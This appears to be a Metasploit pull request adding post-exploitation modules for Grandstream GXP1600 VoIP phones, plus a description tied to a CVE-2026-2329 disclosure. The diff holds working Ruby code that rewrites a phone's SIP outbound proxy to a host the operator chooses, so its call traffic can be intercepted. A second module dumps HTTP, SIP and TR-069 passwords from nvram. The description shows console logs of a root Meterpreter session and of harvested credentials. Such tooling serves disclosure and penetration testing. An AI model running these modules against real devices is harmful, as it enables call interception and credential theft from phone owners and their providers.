+          ['start', { 'Description' => 'Start proxying SIP account traffic.' }],
+          ['stop', { 'Description' => 'Start proxying SIP account traffic.' }]
+        ],
+        'DefaultAction' => 'list',
+        'Notes' => {
+          'Stability' => [
+            # The phone service will not crash as we are only reconfiguring the phone.
+            CRASH_SAFE,
+            # If we don't revert the config changes after we proxy a SIP account, that SIP account cant operate if
+            # the remote proxy is down.
+            SERVICE_RESOURCE_LOSS
+          ],
+          'Reliability' => [],
+          'SideEffects' => [
+            # We config the phone to use our SIP proxy.
+            CONFIG_CHANGES,
+            # Adding a new SIP proxy may introduce audible latency during phone calls.
+            AUDIO_EFFECTS
+          ],
+          'RelatedModules' => [
+            'exploit/linux/http/grandstream_gxp1600_unauth_rce',
+            'post/linux/gather/grandstream_gxp1600_creds'
+          ]
+        }
+      )
+    )
+
+    register_options([
+      OptPort.new('SIP_PROXY_UDP_PORT', [true, 'The remote SIP proxy UDP port', 5060 ]),
+      OptAddress.new('SIP_PROXY_HOST', [true, 'The remote SIP proxy host address', nil]),
+      OptInt.new('SIP_ACCOUNT_INDEX', [false, 'The zero-based SIP Account index to operate on.'], conditions: [ 'ACTION', 'in', %w[start stop]]),
+    ])
+  end
+
+  def run
+    unless action.name == 'list'
+      fail_with(Failure::BadConfig, 'You must set the SIP_ACCOUNT_INDEX option.') if datastore['SIP_ACCOUNT_INDEX'].blank?
+
+      fail_with(Failure::BadConfig, 'You must set the SIP_ACCOUNT_INDEX to a positive integer.') if datastore['SIP_ACCOUNT_INDEX'].negative?
+    end
+
+    fail_with(Failure::NoTarget, 'Module cannot run against this target.') unless gxp1600?
+
+    sip_account = nil
+
+    unless action.name == 'list'
+
+      fail_with(Failure::BadConfig, 'You must set the SIP_ACCOUNT_INDEX to a valid index value.') if datastore['SIP_ACCOUNT_INDEX'] >= get_num_accounts
+
+      sip_account = get_sip_account(datastore['SIP_ACCOUNT_INDEX'])
+
+      fail_with(Failure::UnexpectedReply, 'Failed to retrieve the SIP account details.') unless sip_account
+    end
+
+    case action.name
+    when 'list'
+      list
+    when 'start'
+      start(sip_account)
+    when 'stop'
+      stop
+    end
+  end
+
+  def list
+    columns = ['Account Index', 'Account Enabled', 'Account Name', 'Display Name', 'User ID', 'Registrar Server', 'Registrar Server Transport', 'Outbound Proxy', 'Can Capture?']
+
+    table = Rex::Text::Table.new(
+      'Header' => 'SIP Accounts',
+      'Indent' => 1,
+      'Columns' => columns,
+      'ColProps' => {
+        'Can Capture?' => {
+          'Stylers' => [::Msf::Ui::Console::TablePrint::CustomColorStyler.new({ 'Yes' => '%grn', 'No' => '%red' })]
+        }
+      }
+    )
+
+    0.upto(get_num_accounts - 1) do |account_idx|
+      sip_account = get_sip_account(account_idx)
+
+      next unless sip_account
+
+      table << [
+        account_idx.to_s,
+        sip_account.dig('AccountEnable', 'data') == '0' ? 'No' : 'Yes',
+        sip_account.dig('AccountName', 'data'),
+        sip_account.dig('DisplayName', 'data'),
+        sip_account.dig('UserID', 'data'),
+        sip_account.dig('RegistrarServer', 'data'),
+        transport_type(sip_account.dig('RegistrarServerTransport', 'data')),
+        sip_account.dig('OutboundProxy', 'data'),
+        can_capture?(sip_account) ? 'Yes' : 'No'
+      ]
+    end
+
+    print_line(table.to_s)
+  end
+
+  def start(sip_account)
+    fail_with(Failure::BadConfig, 'This SIP account traffic cannot be captured.') unless can_capture? sip_account
+
+    # modify config...
+    sip_account['AccountEnable']['data'] = 1
+    sip_account['OutboundProxy']['data'] = "#{datastore['SIP_PROXY_HOST']}:#{datastore['SIP_PROXY_UDP_PORT']}"
+    sip_account['UserAgentTransport']['data'] = 0 # udp
+    sip_account['X_GRANDSTREAM_RemoveOBPFromRoute']['data'] = 0 # In route
+
+    # backup current config to the devices /tmp folder, so we can easily restore orig settings, even in a new session.
+    enc_data = Msf::Simple::Buffer.transform(sip_account.to_json.to_s, 'raw', '', { format: 'rc4', key: Rex::Text.sha2(client.core.machine_id) })
+
+    sip_account_backup_path = "/tmp/#{Rex::Text.sha1("#{client.core.machine_id}_#{sip_account['index']}")}"
+
+    write_file(sip_account_backup_path, enc_data)
+
+    write_config(sip_account)
+  end
+
+  def stop
+    sip_account_backup_path = "/tmp/#{Rex::Text.sha1("#{client.core.machine_id}_#{datastore['SIP_ACCOUNT_INDEX']}")}"
+
+    print_status("Reading SIP account backup configuration: #{sip_account_backup_path}")
+    enc_data = read_file(sip_account_backup_path)
+
+    fail_with(Failure::BadConfig, 'No SIP account backup configuration.') unless enc_data
+
+    print_status('Decrypting SIP account backup configuration.')
+    dec_data = Msf::Simple::Buffer.transform(enc_data, 'raw', '', { format: 'rc4', key: Rex::Text.sha2(client.core.machine_id) })
+
+    sip_account = JSON.parse(dec_data)
+
+    if sip_account['index'].to_i != datastore['SIP_ACCOUNT_INDEX'].to_i
+      fail_with(Failure::BadConfig, 'SIP account index mismatch.')
+    end
+
+    print_status('Reverting SIP account backup configuration')
+    write_config(sip_account, revert: true)
+
+    print_status("Deleting SIP account backup configuration: #{sip_account_backup_path}")
+    file_rm(sip_account_backup_path)
+  rescue JSON::ParserError
+    fail_with(Failure::BadConfig, 'Failed to parse SIP account backup configuration.')
+  end
+
+  def gxp1600?
+    unless is_root?
+      user = cmd_exec('/usr/bin/whoami')
+      print_error("This module requires root permissions. Module running as \"#{user}\" user.")
+      return false
+    end
+
+    unless file? '/usr/bin/nvram'
+      print_error('nvram binary not found')
+      return false
+    end
+
+    model_str = nvram_get(89)
+
+    # These 6 models all share the same firmware for the GXP1600 range.
+    affected_models = %w[GXP1610 GXP1615 GXP1620 GXP1625 GXP1628 GXP1630]
+
+    unless affected_models.include? model_str
+      print_error("Phone is not a GXP1600 model. Detected model \"#{model_str}\".")
+      return false
+    end
+
+    print_status("Module running against phone model #{model_str}")
+    true
+  end
+
+  def nvram_get(pvalue)
+    cmd_exec("/usr/bin/nvram get #{pvalue}")
+  end
+
+  def nvram_set(pvalue, data)
+    cmd_exec("/usr/bin/nvram xet #{pvalue}=\"#{data.to_s.gsub('"', '\\"')}\"")
+  end
+
+  def nvram_commit
+    # commit the changes to nvram
+    cmd_exec('/usr/bin/nvram commit')
+
+    # dbus_session will be something like "unix:path=/tmp/dbus-NS7MvuwBIA,guid=857fea90b077e2fbf8226a770000000e"
+    dbus_session = cmd_exec('/usr/bin/nvram get dbus_session')
+
+    # force the phone to pick up the changes
+    cmd_exec("DBUS_SESSION_BUS_ADDRESS=#{dbus_session} /usr/bin/dbus-send --session /com/grandstream/dbus/gui com.grandstream.dbus.signal.cfupdated")
+  end
+
+  def write_config(sip_account, revert: false)
+    changes = 0
+
+    sip_account.each_value do |v|
+      next unless v.instance_of? Hash
+
+      next if v['data'] == v['orig_data']
+
+      if revert
+        nvram_set(v['pvalue'], v['orig_data'])
+      else
+        nvram_set(v['pvalue'], v['data'])
+      end
+
+      changes += 1
+    end
+
+    nvram_commit unless changes.zero?
+  end
+
+  def get_num_accounts
+    read_file('/proc/gxp/dev_info/hw_features/num_accts').to_i
+  end
+
+  def get_sip_account(idx)
+    # The GXP1600 series supports up to 6 SIP accounts, depending on the model.
+    return nil unless (0..5).include?(idx)
+
+    sip_accounts = {
+      'AccountEnable' => [271, 401, 501, 601, 1701, 1801],
+      'AccountName' => [270, 417, 517, 617, 1717, 1817],
+      'DisplayName' => [3, 407, 507, 607, 1707, 1807],
+      'AuthPassword' => [34, 406, 506, 606, 1706, 1806],
+      'UserID' => [35, 404, 504, 604, 1704, 1804],
+      'AuthUserName' => [36, 405, 505, 605, 1705, 1805],
+      'RegistrarServer' => [47, 402, 502, 602, 1702, 1802],
+      'RegistrarServerTransport' => [130, 448, 548, 648, 1748, 1848], # 0 - udp, 1 - tcp, 2 - tcp/tls
+      'OutboundProxy' => [48, 403, 503, 603, 1703, 1803],
+      'UserAgentPort' => [40, 413, 513, 613, 1713, 1813],
+      'UserAgentTransport' => [130, 448, 548, 648, 1748, 1848], # 0 - udp, 1 - tcp, 2 - tcp/tls
+      'X_GRANDSTREAM_RemoveOBPFromRoute' => [2305, 2405, 2505, 2605, 2705, 2805] # 0 - In route,  1 - Not in route, 2 - Always send to
+    }
+
+    sip_account = {
+      'index' => idx
+    }
+
+    sip_accounts.each do |pvalue_name, pvalue_array|
+      data = nvram_get(pvalue_array[idx])
+      sip_account[pvalue_name] = {
+        'pvalue' => pvalue_array[idx],
+        'data' => data.dup,
+        'orig_data' => data.dup
+      }
+    end
+
+    sip_account
+  end
+
+  def transport_type(sip_transport)
+    case sip_transport
+    when '0'
+      'udp'
+    when '1'
+      'tcp'
+    when '2'
+      'tcp/tls'
+    else
+      'unknown'
+    end
+  end
+
+  def can_capture?(sip_account)
+    !sip_account.dig('RegistrarServer', 'data').blank? &&
+      (transport_type(sip_account.dig('RegistrarServerTransport', 'data')) == 'udp') &&
+      (transport_type(sip_account.dig('UserAgentTransport', 'data')) == 'udp')
+  end
+
+end

--- a/modules/post/linux/capture/grandstream_gxp1600_sip.rb
+++ b/modules/post/linux/capture/grandstream_gxp1600_sip.rb
@@ -138,7 +138,7 @@ class MetasploitModule < Msf::Post
 
     sip_account_backup_path = "/tmp/#{Rex::Text.sha1("#{client.core.machine_id}_#{sip_account['index']}")}"
 
-    write_file(sip_account_backup_path, enc_data)
+    fail_with(Failure::BadConfig, 'This SIP account config cannot be backed up.') unless write_file(sip_account_backup_path, enc_data)
 
     write_config(sip_account)
   end

--- a/modules/post/linux/gather/grandstream_gxp1600_creds.rb
+++ b/modules/post/linux/gather/grandstream_gxp1600_creds.rb
@@ -1,0 +1,219 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GrandStream GXP1600 Gather Credentials',
+        'Description' => %q{
+          This gather module works against Grandstream GXP1600 series VoIP devices and can collect HTTP, SIP, and TR-069
+          credentials from a device. You can first leverage the `exploit/linux/http/grandstream_gxp1600_unauth_rce` exploit
+          module to get a root session on a target GXP1600 series device before running this post module.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7'
+        ],
+        'Platform' => ['linux'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [],
+          'RelatedModules' => [
+            'exploit/linux/http/grandstream_gxp1600_unauth_rce',
+            'post/linux/capture/grandstream_gxp1600_sip'
+          ]
+        }
+      )
+    )
+  end
+
+  # NOTE: All pvalue's are taken from the file /app/config/tr069/CpeDataModel.
+  def run
+    fail_with(Failure::NoTarget, 'Module cannot run against this target.') unless gxp1600?
+
+    # Gather the creds for the phones web based management interface.
+    http_users = [
+      ['admin', 2],
+      ['user', 196]
+    ]
+
+    http_users.each do |username, pvalue|
+      password = cmd_exec("/usr/bin/nvram get #{pvalue}")
+      next if password.blank?
+
+      print_good("Gathered HTTP account #{username}:#{password}")
+
+      store_valid_credential(
+        user: username,
+        private: password,
+        private_type: :password,
+        service_data: {
+          origin_type: :service,
+          address: rhost,
+          port: rport,
+          service_name: 'http',
+          protocol: 'tcp'
+        }
+      )
+    end
+
+    # The GXP1600 series supports up to 6 SIP accounts, depending on the model.
+    sip_accounts = {
+      'AccountName' => [270, 417, 517, 617, 1717, 1817],
+      'DisplayName' => [3, 407, 507, 607, 1707, 1807],
+      'RegistrarServer' => [47, 402, 502, 602, 1702, 1802],
+      'RegistrarServerPort' => [47, 402, 502, 602, 1702, 1802],
+      'RegistrarServerTransport' => [130, 448, 548, 648, 1748, 1848],
+      'AuthPassword' => [34, 406, 506, 606, 1706, 1806],
+      'UserID' => [35, 404, 504, 604, 1704, 1804],
+      'AuthUserName' => [36, 405, 505, 605, 1705, 1805]
+    }
+
+    num_accts = read_file('/proc/gxp/dev_info/hw_features/num_accts').to_i
+
+    0.upto(num_accts - 1) do |account_idx|
+      sip_account = {}
+
+      sip_accounts.each do |pvalue_name, pvalue_array|
+        sip_account[pvalue_name] = cmd_exec("/usr/bin/nvram get #{pvalue_array[account_idx]}")
+      end
+
+      sip_username = sip_account['AuthUserName']
+      sip_username = sip_account['UserID'] if sip_username.blank?
+
+      next if sip_username.blank?
+
+      sip_server = sip_account['RegistrarServer']
+
+      next if sip_server.blank?
+
+      # The RegistrarServer and RegistrarServerPort may actually be the same value, i.e. "address:port" or they may be
+      # two separate value, one for the address and the other for the port.
+      # Leverage to_i to try and convert the RegistrarServerPort to an integer, this will only work if the port is
+      # a separate value.
+
+      # First try to split the address if its in address:port notation. If it is not, then sip_port will be nil.
+      sip_server, sip_port = sip_server.split(':')
+
+      # If we have an explicit RegistrarServerPort, try to get the integer value. If we fail, we default later
+      # to a known port value.
+      if sip_account['RegistrarServerPort'] != sip_account['RegistrarServer']
+        sip_port = sip_account['RegistrarServerPort'].to_i
+      end
+
+      sip_protocol = nil
+      sip_service = 'sip'
+
+      case sip_account['RegistrarServerTransport']
+      when '0'
+        sip_protocol = 'udp'
+
+        sip_port = 5060 if sip_port.blank?
+      when '1'
+        sip_protocol = 'tcp'
+
+        sip_port = 5060 if sip_port.blank?
+      when '2'
+        sip_protocol = 'tcp'
+
+        sip_service = 'sips'
+
+        sip_port = 5061 if sip_port.blank?
+      end
+
+      print_good("Gathered SIP account <#{sip_service}:#{sip_username}@#{sip_server}:#{sip_port};transport=#{sip_protocol}> with a password of #{sip_account['AuthPassword']}")
+
+      store_valid_credential(
+        user: sip_username,
+        private: sip_account['AuthPassword'],
+        private_type: :password,
+        service_data: {
+          origin_type: :service,
+          address: sip_server,
+          port: sip_port,
+          service_name: sip_service,
+          protocol: sip_protocol
+        }
+      )
+    end
+
+    # TR-069 - Auto Configuration Server
+    management = {
+      'ServerURL' => 4503,
+      'ServerUsername' => 4504,
+      'ServerPassword' => 4505
+    }
+
+    management.each do |pvalue_name, pvalue|
+      management[pvalue_name] = cmd_exec("/usr/bin/nvram get #{pvalue}")
+    end
+
+    unless management['ServerURL'].blank? || management['ServerUsername'].blank? || management['ServerPassword'].blank?
+      print_good("Gathered TR-069 Auto Configuration Server account #{management['ServerUsername']}:#{management['ServerPassword']} for #{management['ServerURL']}")
+
+      uri = nil
+
+      begin
+        if Rex::Socket.is_ip_addr? management['ServerURL']
+          uri = URI.parse("http://#{management['ServerURL']}/")
+        else
+          uri = URI.parse(management['ServerURL'])
+        end
+      rescue URI::InvalidURIError
+        print_error("Failed to parse the URI '#{management['ServerURL']}'")
+      end
+
+      unless uri.nil?
+        store_valid_credential(
+          user: management['ServerUsername'],
+          private: management['ServerPassword'],
+          private_type: :password,
+          service_data: {
+            origin_type: :service,
+            address: Rex::Socket.getaddress(uri.host),
+            port: uri.port,
+            service_name: uri.scheme,
+            protocol: 'tcp',
+            realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+            realm_value: uri.path.blank? ? '/' : uri.path
+          }
+        )
+      end
+    end
+  end
+
+  def gxp1600?
+    unless is_root?
+      user = cmd_exec('/usr/bin/whoami')
+      print_error("This module requires root permissions. Module running as \"#{user}\" user.")
+      return false
+    end
+
+    unless file? '/usr/bin/nvram'
+      print_error('nvram binary not found')
+      return false
+    end
+
+    model_str = cmd_exec('/usr/bin/nvram get 89')
+
+    # These 6 models all share the same firmware for the GXP1600 range.
+    affected_models = %w[GXP1610 GXP1615 GXP1620 GXP1625 GXP1628 GXP1630]
+
+    unless affected_models.include? model_str
+      print_error("Phone is not a GXP1600 model. Detected model \"#{model_str}\".")
+      return false
+    end
+
+    print_status("Module running against phone model #{model_str}")
+    true
+  end
+end


### PR DESCRIPTION
## Overview
This pull request adds three new modules, all targeting the Grandstream GXP1600 series of VoIP devices. This is the accompanying work to our disclosure for CVE-2026-2329. The three modules are:

* `exploit/linux/http/grandstream_gxp1600_unauth_rce` - Exploits the stack-based buffer overflow CVE-2026-2329, for unauthenticated RCE on a target device.
* `post/linux/gather/grandstream_gxp1600_creds` - Post module to gather credentials from a target device.
* `post/linux/capture/grandstream_gxp1600_sip` - Post module to reconfigure a target device to use a SIP proxy in order to capture SIP traffic.

You can read [our disclosure](https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed) for a technical analysis of CVE-2026-2329.

## Example (`exploit/linux/http/grandstream_gxp1600_unauth_rce`)

This example shows the exploit module getting a root Meterpreter session on a target GXP1630 device.

```
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > check
[*] 192.168.86.77:80 - The target appears to be vulnerable. GrandStream GXP1630 version 1.0.7.78
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. GrandStream GXP1630 version 1.0.7.78
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.77:59112) at 2026-02-16 12:21:07 +0000
[!] This exploit may require manual cleanup of '/tmp/core.gz' on the target
[!] This exploit may require manual cleanup of '/core' on the target

meterpreter > getuid 
Server username: root
```

## Example (`post/linux/gather/grandstream_gxp1600_creds`)

This example shows the post module, leveraging the session we established via the exploit module, to gather all available HTTP, SIP, and TR-069 credentials from the device. 

_NOTE: All credential information below has been redacted via `*` characters._

```
msf post(linux/gather/grandstream_gxp1600_creds) > run
[*] Module running against phone model GXP1630
[+] Gathered HTTP account admin:********
[+] Gathered HTTP account user:123
[+] Gathered SIP account <sip:**********@***************:8060;transport=udp> with a password of ********
[+] Gathered SIP account <sip:************@*********************:5060;transport=udp> with a password of **********
[*] Post module execution completed
```

## Example (`post/linux/capture/grandstream_gxp1600_sip`)

This example shows the post module, leveraging the session we established via the exploit module, to reconfigure the device to use a SIP proxy (running on a separate host) to capture SIP traffic.

_NOTE: A suitable SIP proxy is not part of MSF (although it can be at a future date), and the MSF user can bring whatever SIP proxy they want. For research and testing, a suitable SIP proxy (written in Ruby so we can bring it into MSF if we want) is available [here](https://github.com/sfewer-r7/sip-proxy)._

_NOTE: Only SIP UDP transports are supported. Future work would can add TCP and TCP/TLS transport support._

```
msf post(linux/capture/grandstream_gxp1600_sip) > set SIP_PROXY_HOST 192.168.86.35
SIP_PROXY_HOST => 192.168.86.35
msf post(linux/capture/grandstream_gxp1600_sip) > list
[*] Module running against phone model GXP1630
SIP Accounts
============

 Account Index  Account Enabled  Account Name  Display Name  User ID       Registrar Server            Registrar Server Transport  Outbound Proxy  Can Capture?
 -------------  ---------------  ------------  ------------  -------       ----------------            --------------------------  --------------  ------------
 0              Yes              ********                    **********    ***************:8060        udp                                         Yes
 1              No               *********                   ************  *********************:5060  udp                                         Yes
 2              No                                                                                     udp                                         No

[*] Post module execution completed
msf post(linux/capture/grandstream_gxp1600_sip) > set SIP_ACCOUNT_INDEX 0
SIP_ACCOUNT_INDEX => 0
msf post(linux/capture/grandstream_gxp1600_sip) > start
[*] Module running against phone model GXP1630
[*] Post module execution completed
msf post(linux/capture/grandstream_gxp1600_sip) > list
[*] Module running against phone model GXP1630
SIP Accounts
============

 Account Index  Account Enabled  Account Name  Display Name  User ID       Registrar Server            Registrar Server Transport  Outbound Proxy      Can Capture?
 -------------  ---------------  ------------  ------------  -------       ----------------            --------------------------  --------------      ------------
 0              Yes              ********                    **********    ***************:8060        udp                         192.168.86.35:5060  Yes
 1              No               *********                   ************  *********************:5060  udp                                             Yes
 2              No                                                                                     udp                                             No

[*] Post module execution completed
msf post(linux/capture/grandstream_gxp1600_sip) > stop
[*] Module running against phone model GXP1630
[*] Reading SIP account backup configuration: /tmp/10a334a378afafffb9d874b6907836d784df4cba
[*] Decrypting SIP account backup configuration.
[*] Reverting SIP account backup configuration
[*] Deleting SIP account backup configuration: /tmp/10a334a378afafffb9d874b6907836d784df4cba
[*] Post module execution completed
msf post(linux/capture/grandstream_gxp1600_sip) >
```